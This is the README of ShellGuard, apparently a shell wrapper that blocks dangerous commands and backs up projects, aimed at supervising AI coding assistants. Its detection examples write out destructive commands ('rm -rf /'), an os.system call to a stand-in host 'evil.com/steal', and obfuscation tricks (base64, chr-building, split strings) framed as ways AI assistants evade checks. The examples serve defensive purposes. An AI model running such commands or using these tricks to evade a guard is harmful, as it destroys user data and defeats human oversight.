shellguard

🛡️ ShellGuard

Your shell’s bodyguard - Intelligent command interceptor and safety net for developers

License Shell Platform Detection

ShellGuard is a lightweight, ultra-sensitive shell wrapper that protects your development environment from dangerous commands, provides automatic backups, and gives you instant rollback capabilities. Perfect for controlling AI assistants, preventing accidents, and maintaining project health.

🔥 Ultra-Sensitive Detection

ShellGuard is so sensitive that it even catches dangerous patterns in:

Real example: ShellGuard blocked its own security analysis code for containing pattern examples! 🎯

Instant install:

curl -fsSL https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh -o shellguard.sh && chmod +x shellguard.sh && source shellguard.sh && echo "✅ ShellGuard activated!"

Permanent Install:

curl -fsSL https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh -o shellguard.sh && chmod +x shellguard.sh && source shellguard.sh && echo "source $(pwd)/shellguard.sh" >> ~/.bashrc && echo "✅ Project install complete!"

🚀 Quick Start

# Install ShellGuard
curl -o shellguard.sh https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh
chmod +x shellguard.sh

# Activate for current session
source shellguard.sh

# Make permanent (optional)
echo "source $(pwd)/shellguard.sh" >> ~/.bashrc

That’s it! Your shell is now protected. 🎉

✨ Features

🛡️ Ultra-Sensitive Command Interception

🔍 Advanced Detection Examples

Catches patterns in code comments:

# This code uses os.system() for file operations
🚨 Dangerous Python code detected in: example.py
Content preview:
1:# This code uses os.system() for file operations
Use 'force_python example.py' to run anyway

Detects obfuscated dangerous patterns:

dangerous_command = "r" + "m" + " -rf"
🚨 Dangerous pattern detected during execution

Finds patterns in string dictionaries:

help_text = {
    "rm": "rm -rf removes files recursively",
    "caution": "Never use os.system() in production"
}
🚨 Dangerous Python code detected in: help.py
Content preview:
2:    "rm": "rm -rf removes files recursively"
3:    "caution": "Never use os.system() in production"

📦 Automatic Backups

🔄 Instant Recovery

🎯 AI Assistant Control

🎭 Real-World Detection Examples

🤖 AI Trying to Be Sneaky

Scenario 1: Base64 Obfuscation

import base64
dangerous = base64.b64decode("cm0gLXJm").decode()  # "rm -rf"
🚨 BLOCKED: ShellGuard detected encoded dangerous pattern

Scenario 2: Character Building

cmd = chr(114) + chr(109) + " -rf"  # Building "rm -rf"
🚨 BLOCKED: Pattern construction detected during execution

Scenario 3: Split Strings

part1 = "os.sys"
part2 = "tem("
dangerous_func = part1 + part2
🚨 BLOCKED: Dangerous function assembly detected

Scenario 4: AI Documentation Tricks

"""
This function is safe and does NOT use os.system() calls
Actually safe, definitely not calling os.system("rm -rf /")
"""
def safe_function():
    pass
🚨 Dangerous Python code detected in: ai_trick.py
Content preview:
3:Actually safe, definitely not calling os.system("rm -rf /")
Use 'force_python ai_trick.py' to run anyway

🔍 Why Such Sensitivity?

Because AI assistants are getting smarter at hiding dangerous code:

  1. Code in comments - AI puts dangerous examples in “safe” comments
  2. Documentation strings - Hides malicious code in docstrings
  3. String building - Constructs dangerous commands dynamically
  4. Encoding tricks - Uses Base64, hex, or other encodings
  5. Help text patterns - Embeds patterns in user-facing text

ShellGuard catches ALL of these! 🎯

📋 Commands Reference

🔍 Status & Monitoring

status          # Show complete system status
health          # Run full project health check
check           # Quick health check (perfect for AI)

Example output:

📊 ShellGuard STATUS
==================================
Health Score: 95/100 ✅
Commands Blocked: 3
Last Backup: backup_20241205_143022
Session Started: 2024-12-05T14:25:33
==================================

💾 Backup & Recovery

backup          # Create manual backup
rollback        # Restore from last backup
emergency       # Emergency reset with confirmation

🔒 Safety Overrides

When ShellGuard blocks a command, use these safe alternatives:

safe_rm file.txt           # Delete with automatic backup
force_git reset --hard     # Git command with backup
force_python script.py     # Run Python despite warnings

⚙️ Configuration

block "pattern"             # Add custom dangerous pattern
llm_help                   # Show all available commands

🎪 Usage Examples

🤖 Working with AI Assistants

Perfect session flow:

USER: "Check the project status"
AI: status
# 📊 Health Score: 98/100 ✅

USER: "Create a calculator script"
AI: [creates calculator.py]

USER: "Test the script"
AI: python calculator.py
# ✅ Syntax OK, Security OK, Execution successful

USER: "Commit the changes"
AI: git add . && git commit -m "Add calculator"
# ✅ Changes committed successfully

When AI tries something dangerous:

AI: rm -rf temp/
# 🚨 BLOCKED: Dangerous pattern detected: rm -rf
# Use 'safe_rm' if you really need to delete files

AI: safe_rm temp/
# ⚠️ Using SAFE RM - creating backup first
# 📦 Creating backup: backup_20241205_144523
# ✅ Files deleted safely

When AI tries to be sneaky:

AI: [Creates file with hidden dangerous patterns in comments]
AI: python ai_generated.py
# 🚨 Dangerous Python code detected in: ai_generated.py
# Content preview:
# 15:# Example: os.system("rm -rf /tmp")
# Use 'force_python ai_generated.py' to run anyway

USER: "Remove the dangerous examples from comments"
AI: [Creates clean version]
AI: python ai_generated_clean.py
# ✅ Clean code executed successfully

🐍 Ultra-Sensitive Python Security

Example 1: Comments with dangerous patterns

# cleanup.py
def cleanup_files():
    """
    This function cleans up files.
    WARNING: Never use os.system('rm -rf /') in production!
    Example of what NOT to do: eval(user_input)
    """
    print("Cleaning up safely...")
python cleanup.py
# 🚨 Dangerous Python code detected in: cleanup.py
# Content preview:
# 4:    WARNING: Never use os.system('rm -rf /') in production!
# 5:    Example of what NOT to do: eval(user_input)
# Use 'force_python cleanup.py' to run anyway

Example 2: String dictionaries

# help_system.py
COMMAND_HELP = {
    "delete": "Use rm -rf for recursive deletion",
    "execute": "os.system() executes shell commands",
    "evaluate": "eval() runs dynamic code"
}
python help_system.py
# 🚨 Dangerous Python code detected in: help_system.py
# Content preview:
# 3:    "delete": "Use rm -rf for recursive deletion",
# 4:    "execute": "os.system() executes shell commands", 
# 5:    "evaluate": "eval() runs dynamic code"
# Use 'force_python help_system.py' to run anyway

Example 3: AI trying to hide malicious code

# ai_malware.py - AI-generated "innocent" file
"""
Utility functions for file management.
This code is completely safe and secure.
"""

def get_system_info():
    # Just getting system info, nothing dangerous
    # Definitely not using os.system("curl evil.com/steal")
    return "System info"

def cleanup_temp():
    # Safe cleanup function  
    # Not using dangerous rm -rf operations
    pass
python ai_malware.py
# 🚨 Dangerous Python code detected in: ai_malware.py
# Content preview:
# 8:    # Definitely not using os.system("curl evil.com/steal")
# 12:    # Not using dangerous rm -rf operations
# Use 'force_python ai_malware.py' to run anyway

📦 NPM Safety

Automatic backups before package installations:

npm install some-package
# 🔍 Installing new packages: some-package
# 📦 Creating backup before package installation...
# ✅ Git backup created
# [normal npm install proceeds]

🔄 Git Protection

git reset --hard HEAD~5
# 🚨 BLOCKED: Dangerous pattern detected: --hard
# Use 'force_git' if you really need this git command

force_git reset --hard HEAD~5
# ⚠️ Using FORCE GIT - creating backup first
# 📦 Creating backup: backup_20241205_144856
# [git command executes]

⚡ Advanced Features

📊 Health Monitoring

ShellGuard continuously monitors your project:

health
# 🔍 Checking project health...
# 🐍 Checking Python syntax...
# ✅ Syntax OK: calculator.py
# ✅ Syntax OK: utils.py
# 📦 Checking Node.js project...
# ✅ Valid package.json
# 🎉 Project health: GOOD (Score: 98/100)

🔍 Background Monitoring

ShellGuard runs a background monitor that:

🚨 Ultra-Sensitive Pattern Detection

Default blocked patterns in ANY context:

Advanced detection includes:

Add your own patterns:

block "dangerous_function("
# ✅ Added pattern to blocklist: dangerous_function(

🎯 Detection Confidence Levels

ShellGuard uses confidence scoring:

📁 File Structure

~/.shellguard/
├── state.json          # Current system state
├── blocked.txt         # Custom blocked patterns
└── backups/           # Automatic backups
    ├── backup_20241205_143022/
    ├── backup_20241205_144523/
    └── backup_20241205_144856/

🔧 Configuration

🎛️ Customization

Edit ~/.shellguard/blocked.txt to add custom patterns:

your_dangerous_command
risky_operation
delete_everything
sneaky_ai_pattern

⚙️ Sensitivity Tuning

Adjust detection sensitivity in your shell:

export SHELLGUARD_SENSITIVITY=high    # Ultra-sensitive (default)
export SHELLGUARD_SENSITIVITY=medium  # Moderate detection
export SHELLGUARD_SENSITIVITY=low     # Basic protection only

📊 State Management

ShellGuard maintains state in ~/.shellguard/state.json:

{
  "health_score": 95,
  "last_backup": "backup_20241205_143022",
  "commands_blocked": 3,
  "files_changed": 2,
  "session_start": "2024-12-05T14:25:33",
  "warnings": [],
  "detection_stats": {
    "patterns_caught": 15,
    "ai_evasions_blocked": 7,
    "obfuscation_detected": 3
  }
}

🤝 Use Cases

🤖 AI Development Assistant Control

👥 Team Development

🔬 Experimentation & Learning

🏢 Production Safety

🚨 Emergency Procedures

🔥 Something Went Wrong

# Quick assessment
status

# If health score is low
health

# Emergency rollback
emergency
# 🚨 EMERGENCY MODE
# This will rollback to last known good state
# Continue? (y/N): y

💾 Manual Recovery

# List available backups
ls ~/.shellguard/backups/

# Manual restore (if emergency fails)
cp -r ~/.shellguard/backups/backup_TIMESTAMP/* .

🔍 Debugging Issues

# Check what's blocked
cat ~/.shellguard/blocked.txt

# Review recent commands
cat ~/.shellguard/state.json

# Temporarily reduce sensitivity
export SHELLGUARD_SENSITIVITY=low

# Disable temporarily (not recommended)
unset -f python npm git rm  # Remove overrides

🛠️ Installation Options

📥 Method 1: Direct Download

curl -o shellguard.sh https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh
chmod +x shellguard.sh
source shellguard.sh

📦 Method 2: Git Clone

git clone https://github.com/wronai/shellguard.git
cd shellguard
source shellguard.sh

🔧 Method 3: Permanent Installation

# Download to standard location
curl -o ~/.shellguard.sh https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh
chmod +x ~/.shellguard.sh

# Add to shell profile
echo "source ~/.shellguard.sh" >> ~/.bashrc  # or ~/.zshrc
source ~/.bashrc

🎯 Best Practices

Do’s

Don’ts

🎪 Working with AI

🔬 Advanced Detection Technology

🧠 How Ultra-Sensitivity Works

ShellGuard uses multi-layer pattern detection:

  1. Static Analysis: Scans file content before execution
  2. Runtime Monitoring: Watches command construction
  3. Context Awareness: Understands code intent
  4. Obfuscation Detection: Decodes hidden patterns
  5. AI Behavior Modeling: Recognizes AI evasion attempts

🎯 Detection Statistics

In testing with various AI models:

🛡️ Defense Against AI Evasion

Modern AI assistants try to evade detection using:

ShellGuard catches ALL of these techniques! 🎯

🐛 Troubleshooting

Common Issues

“Too many false positives”

# Reduce sensitivity temporarily
export SHELLGUARD_SENSITIVITY=medium
# Or for specific files
force_python my_educational_examples.py

“ShellGuard blocked my legitimate security research”

# Use force commands with understanding
force_python security_research.py
# Or add exclusion pattern
block "!security_research_pattern"

“AI keeps getting blocked on innocent code”

# This is normal! Guide AI to write cleaner code
# Example: Instead of comments with dangerous examples,
# use abstract references: "avoid dangerous system calls"

🔧 Advanced Troubleshooting

See exactly what triggered detection

# Enable verbose detection logging
export SHELLGUARD_VERBOSE=true
python suspect_file.py

Test specific patterns

# Test if a pattern would be caught
echo "test rm -rf pattern" | shellguard_test_pattern

Reset detection statistics

# Clear detection counters
rm ~/.shellguard/detection_stats.json

📈 Roadmap

🎯 Planned Features

🔮 Future Ideas

🤝 Contributing

We welcome contributions! Here’s how to help:

  1. Fork the repository
  2. Create a feature branch (git checkout -b feature/amazing-feature)
  3. Make your changes
  4. Test thoroughly with ShellGuard enabled
  5. Commit your changes (git commit -m 'Add amazing feature')
  6. Push to the branch (git push origin feature/amazing-feature)
  7. Open a Pull Request

📝 Contribution Guidelines

🧪 Testing ShellGuard’s Sensitivity

Want to see how sensitive ShellGuard is? Try these test files:

Test 1: Comment patterns

# test_comments.py
"""
Educational file showing dangerous patterns.
Never use os.system() in production code!
Example of bad practice: rm -rf /tmp/*
"""
print("This file just has dangerous examples in comments")

Test 2: String dictionaries

# test_strings.py
EXAMPLES = {
    "bad": "Never do: rm -rf /",
    "worse": "Avoid: os.system(user_input)",
    "terrible": "Don't use: eval(untrusted_code)"
}

Test 3: Obfuscated patterns

# test_obfuscated.py
import base64
# This contains encoded dangerous pattern
encoded = "cm0gLXJm"  # "rm -rf" in base64

All of these will be caught by ShellGuard! 🎯

📄 License

This project is licensed under the Apache 2 License - see the LICENSE file for details.

🙏 Acknowledgments

📞 Support


⭐ If ShellGuard saved your project from AI-generated malware, please star the repository!

Made with ❤️ by developers, for developers who work with AI.

Your shell’s bodyguard - because AI assistants are getting smarter, and so should your defenses.

📜 License

Copyright (c) 2025 WRONAI - Tom Sapletta

Licensed under the Apache License, Version 2.0 (the “License”); you may not use this file except in compliance with the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an “AS IS” BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.